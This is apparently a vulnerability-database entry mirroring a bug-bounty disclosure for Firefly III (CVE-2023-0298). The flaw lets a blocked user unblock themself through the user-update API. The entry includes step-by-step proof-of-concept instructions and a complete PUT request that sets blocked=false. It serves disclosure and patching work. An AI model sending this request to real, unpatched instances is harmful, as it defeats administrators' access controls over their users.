Lucene search
Bauh0lz9689052C-C1D7-4AAE-AA08-346C9B6E04EDHistoryJan 13, 2023 - 6:05 a.m.
A User Can Unblock Themself
2023-01-1306:05:58
bauh0lz
www.huntr.dev
10
put request
user authentication
user unblock
.
EPSS
0.001
Percentile
22.1%
Description
PUT /api/v1/users/{id} API doesn’t properly check the authorizaion.
Proof of Concept
- [admin] Enable user registration functionality.
- [user] Register new user and login as them.
- [user] Create OAuth client.
- [admin] Block the new user on admin panel.
- [user] Send the following request:
PUT /api/v1/users/{id} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/vnd.api+json
Authorization: Bearer {JWT}
Cache-Control: no-cache
Host: localhost:8888
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 13
blocked=false
- [user] Login successfully.
Related
osv
osv
CVE-2023-0298
2023-01-14 08:15:13
Improper Authorization in grumpydictator/firefly-iii
2023-01-14 09:30:23
github
github
Improper Authorization in grumpydictator/firefly-iii
2023-01-14 09:30:23
cvelist
cvelist
CVE-2023-0298 Incorrect Authorization in firefly-iii/firefly-iii
2023-01-14 00:00:00
nvd
nvd
CVE-2023-0298
2023-01-14 08:15:13
prion
prion
Authorization
2023-01-14 08:15:00
cve
cve
CVE-2023-0298
2023-01-14 08:15:13